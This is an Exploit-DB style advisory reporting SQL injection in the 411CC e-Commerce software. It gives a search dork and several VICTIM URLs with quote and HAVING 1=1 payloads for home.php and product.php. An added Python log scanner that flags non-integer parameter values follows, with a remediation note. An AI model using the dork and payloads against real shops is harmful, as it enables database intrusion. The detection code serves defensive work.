411cc – Multiple SQL Injections

  • Author: KnocKout
    Date: 2010-10-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15276/
  • ===================================================================
    411CC e-Commerce <= String(') SQL Injection Vulnerabilities
    ===================================================================
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockoutr@msn.com
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~Web App. : 411CC e-Commerce
    ~Version : N/A
    ~Software: http://www.411cc.com/
    ~Vulnerability Style : SQL Injection
    ~Vulnerability Dir : CCART/customer/
    ~Google Keyword : "Powered By: 411CC"
    ~SQL Method : MSSQL no error
    ~String : '
    [~]Date : "18.10.2010"
    [~]Tested on : (L):Vista, (R):PHP/4.3.9
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    ~~~~~~~~ Exploitation ~~~~~~~~~~~
    String (') SQL Injection Attack..
    http://VICTIM/cccart/customer/home.php?cat=59' {SQL Injection}
    http://VICTIM/cccart/customer/home.php?cat=59' HAVING 1=1/*
    http://VICTIM/cccart/customer/product.php?productid=' {SQL Injection}
    http://VICTIM/cccart/customer/product.php?productid='%27%20having%201=1/*
    ================================
    
     GoodLUCK.
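
A defender-side check for the two injection points listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to home.php and product.php under customer/ whose cat or productid value is not a plain integer. It assumes Common Log Format request lines and that both parameters are integer IDs; the log lines are constructed sample data.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts and parameters named in the advisory.
WATCHED = {"home.php": "cat", "product.php": "productid"}
# Assumption: both parameters are integer IDs in normal use.
NUMERIC = re.compile(r"\d+")
# Request field of a Common Log Format line; tolerant of raw spaces in the URL.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Oct/2010:10:00:01 +0000] "GET /cccart/customer/home.php?cat=59 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Oct/2010:10:00:05 +0000] "GET /cccart/customer/home.php?cat=59%27%20HAVING%201=1/* HTTP/1.1" 200 312',
    '203.0.113.7 - - [18/Oct/2010:10:00:09 +0000] "GET /cccart/customer/product.php?productid=%27%20having%201=1/* HTTP/1.1" 200 298',
    '192.0.2.10 - - [18/Oct/2010:10:00:12 +0000] "GET /cccart/customer/product.php?productid=1042 HTTP/1.1" 200 7300',
]


def flag_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for each watched
    parameter whose value is not a plain integer."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if "/customer/" not in url.path.lower():
            continue
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes, so %27 and a literal ' are treated alike.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == param and not NUMERIC.fullmatch(value):
                hits.append((line_no, script, param, value))
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print("suspicious request: line %d %s?%s=%r" % hit)
```

The same integer-only rule belongs in the application itself: rejecting non-numeric cat and productid values before they reach the query closes the hole that this check only observes.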